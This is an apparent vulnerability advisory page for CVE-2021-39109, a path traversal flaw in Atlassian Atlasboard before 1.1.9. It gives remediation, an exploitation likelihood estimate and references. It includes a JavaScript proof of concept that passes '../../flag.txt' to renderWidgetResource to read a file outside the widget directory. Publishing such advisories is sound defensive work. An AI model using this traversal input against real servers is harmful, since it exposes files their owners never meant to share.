CVE-2021-39109

Description

The renderWidgetResource resource in Atlasian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability. ### PoC ```javascript const widget = require(\"atlasboard/lib/webapp/routes/widget\"); // Mock req and res const req = {}; const res = { sendFile: (filePath) => { // Read and return file contents synchronously const data = fs.readFileSync(filePath, \"utf8\"); console.log(\"Contents of /flag.txt:\"); console.log(data); }, status: function (code) { this.statusCode = code; return this; }, send: function (msg) { throw new Error(`Server responded with status ${this.statusCode}: ${msg}`); }, }; // localPackagesPath set to root to allow traversal to /flag.txt const localPackagesPath = \"/\"; // resource string with path traversal to escape localPackagesPath and widgets directory const resource = \"../../flag.txt\"; // Call vulnerable function await widget.renderWidgetResource(localPackagesPath, resource, req, res); ```

How to fix CVE-2021-39109

To remediate CVE-2021-39109, upgrade the affected package to a fixed version below.

• —upgrade to 1.1.9 or later

Is CVE-2021-39109 being exploited?

Low — EPSS is 0.5%, meaning exploitation activity has not been observed at scale.

Affected packages (1)

• from 0, < 1.1.9

CVSS scores

References (6)

• ADVISORYnvd.nist.gov/vuln/detail/CVE-2021-39109
• WEBarxiv.org/abs/2506.04962
• WEBarxiv.org/pdf/2506.04962
• WEBbitbucket.org/atlassian/atlasboard/commits/9c03df09f09399e2601010466e8ba3a28236eb9c